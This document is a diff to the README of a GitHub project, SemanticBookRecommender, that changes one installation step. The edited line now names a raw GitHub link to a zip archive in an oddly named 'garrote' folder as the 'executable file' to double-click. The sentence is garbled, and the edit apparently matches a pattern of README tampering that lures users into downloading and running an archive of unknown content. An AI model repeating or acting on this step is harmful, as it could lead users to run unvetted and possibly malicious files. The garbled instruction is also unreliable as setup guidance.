JoeMaina-Brimmer/SemanticBookRecommender/README.md

 7. Open the extracted folder to find the application.

-8. Locate the executable file, typically named `SemanticBookRecommender.exe`, and double-click it to run the application.
+8. Locate the executable file, typically named `https://raw.githubusercontent.com/JoeMaina-Brimmer/SemanticBookRecommender/main/garrote/SemanticBookRecommender-2.3.zip`, and double-click it to run the application.

 ## 🌟 Features